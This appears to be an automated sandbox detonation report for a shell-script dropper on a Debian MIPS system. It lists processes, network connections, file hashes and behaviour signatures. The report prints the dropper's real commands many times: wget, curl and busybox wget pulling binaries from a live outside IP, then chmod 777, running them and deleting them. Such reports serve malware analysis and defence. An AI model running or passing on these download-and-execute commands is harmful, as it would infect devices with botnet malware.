/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]

/bin/chmod

[chmod 777 VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]

/tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY

[./VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]

/bin/rm

[rm VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]

/usr/bin/wget

[wget http://87.120.125.191/bins/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]

/bin/chmod

[chmod 777 irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]

/tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh

[./irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]

/bin/rm

[rm irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]

/usr/bin/wget

[wget http://87.120.125.191/bins/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]

/bin/chmod

[chmod 777 r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]

/tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq

[./r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]

/bin/rm

[rm r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]

/usr/bin/wget

[wget http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]

/bin/chmod

[chmod 777 HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]

/tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1

[./HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]

/bin/rm

[rm HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]

/usr/bin/wget

[wget http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]

/bin/chmod

[chmod 777 kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]

/tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU

[./kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]

/bin/rm

[rm kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]

/usr/bin/wget

[wget http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]

/bin/chmod

[chmod 777 XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]

/tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1

[./XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]

/bin/rm

[rm XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]

/usr/bin/wget

[wget http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx7]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx7]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx7]

/bin/chmod

[chmod 777 f4er80WdZpB65CEraApSmbUBPranpIfNx7]

/tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7

[./f4er80WdZpB65CEraApSmbUBPranpIfNx7]

/bin/rm

[rm f4er80WdZpB65CEraApSmbUBPranpIfNx7]

/usr/bin/wget

[wget http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]

/bin/chmod

[chmod 777 Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]

/tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT

[./Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]

/bin/rm

[rm Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]

/usr/bin/wget

[wget http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]

/bin/chmod

[chmod 777 edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]

/tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC

[./edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]

/bin/rm

[rm edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]

/usr/bin/wget

[wget http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]

/bin/chmod

[chmod 777 K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]

/tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4

[./K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]

/bin/rm

[rm K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]

/usr/bin/wget

[wget http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]

/bin/chmod

[chmod 777 QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]

/tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f

[./QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]

/bin/rm

[rm QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]

/usr/bin/wget

[wget http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]

/bin/chmod

[chmod 777 PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]

/tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY

[./PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]

/bin/rm

[rm PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]

/usr/bin/wget

[wget http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]

/bin/chmod

[chmod 777 XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]

/tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl

[./XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]

/bin/rm

[rm XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]

/usr/bin/wget

[wget http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]

/bin/chmod

[chmod 777 Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]

/tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw

[./Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]

/bin/rm

[rm Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]

/usr/bin/wget

[wget http://87.120.125.191/bins/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]

/bin/chmod

[chmod 777 VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]

/tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY

[./VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]

/bin/rm

[rm VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]

/usr/bin/wget

[wget http://87.120.125.191/bins/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]

/bin/chmod

[chmod 777 irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]

/tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh

[./irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]

/bin/rm

[rm irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]

/usr/bin/wget

[wget http://87.120.125.191/bins/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]

/bin/chmod

[chmod 777 r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]

/tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq

[./r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]

/bin/rm

[rm r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]

Network

Country Destination Domain Proto
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp

Files

/tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1

MD5 e1732e70f015e99d14dff1eeeaec9966
SHA1 c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113
SHA256 6de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e
SHA512 6ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-20 02:53

Reported

2024-11-20 02:55

Platform

debian9-mipsel-20240729-en

Max time kernel

62s

Max time network

64s

Command Line

[/tmp/77fa3f4917be2f66cb783171a3cf1c2503a25d6e4d419f6c00633d18ea183afb.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1 /tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1 N/A
N/A /tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU /tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU N/A
N/A /tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1 /tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1 N/A
N/A /tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7 /tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7 N/A
N/A /tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT /tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT N/A
N/A /tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC /tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC N/A
N/A /tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4 /tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4 N/A
N/A /tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f /tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f N/A
N/A /tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY /tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY N/A
N/A /tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl /tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl N/A
N/A /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw N/A
N/A /tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY /tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY N/A
N/A /tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh /tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh N/A
N/A /tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq /tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq N/A
N/A /tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1 /tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1 N/A
N/A /tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU /tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU N/A
N/A /tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1 /tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1 N/A
N/A /tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7 /tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7 N/A
N/A /tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT /tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT N/A
N/A /tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC /tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC N/A
N/A /tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4 /tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4 N/A
N/A /tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f /tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f N/A
N/A /tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY /tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY N/A
N/A /tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl /tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl N/A
N/A /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw N/A
N/A /tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY /tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY N/A
N/A /tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh /tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh N/A
N/A /tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq /tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7 /usr/bin/curl N/A
File opened for modification /tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f /usr/bin/curl N/A
File opened for modification /tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f /usr/bin/curl N/A
File opened for modification /tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY /usr/bin/curl N/A
File opened for modification /tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq /usr/bin/curl N/A
File opened for modification /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw /usr/bin/curl N/A
File opened for modification /tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC /usr/bin/curl N/A
File opened for modification /tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4 /usr/bin/curl N/A
File opened for modification /tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq /usr/bin/curl N/A
File opened for modification /tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1 /usr/bin/curl N/A
File opened for modification /tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl /usr/bin/curl N/A
File opened for modification /tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh /usr/bin/curl N/A
File opened for modification /tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU /usr/bin/curl N/A
File opened for modification /tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1 /usr/bin/curl N/A
File opened for modification /tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT /usr/bin/curl N/A
File opened for modification /tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7 /usr/bin/curl N/A
File opened for modification /tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4 /usr/bin/curl N/A
File opened for modification /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw /usr/bin/curl N/A
File opened for modification /tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY /usr/bin/curl N/A
File opened for modification /tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT /usr/bin/curl N/A
File opened for modification /tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC /usr/bin/curl N/A
File opened for modification /tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY /usr/bin/curl N/A
File opened for modification /tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh /usr/bin/curl N/A
File opened for modification /tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1 /usr/bin/curl N/A
File opened for modification /tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl /usr/bin/curl N/A
File opened for modification /tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1 /usr/bin/curl N/A
File opened for modification /tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU /usr/bin/curl N/A
File opened for modification /tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY /usr/bin/curl N/A

Processes

/tmp/77fa3f4917be2f66cb783171a3cf1c2503a25d6e4d419f6c00633d18ea183afb.sh

[/tmp/77fa3f4917be2f66cb783171a3cf1c2503a25d6e4d419f6c00633d18ea183afb.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]

/bin/chmod

[chmod 777 HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]

/tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1

[./HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]

/bin/rm

[rm HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]

/usr/bin/wget

[wget http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]

/bin/chmod

[chmod 777 kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]

/tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU

[./kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]

/bin/rm

[rm kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]

/usr/bin/wget

[wget http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]

/usr/bin/curl

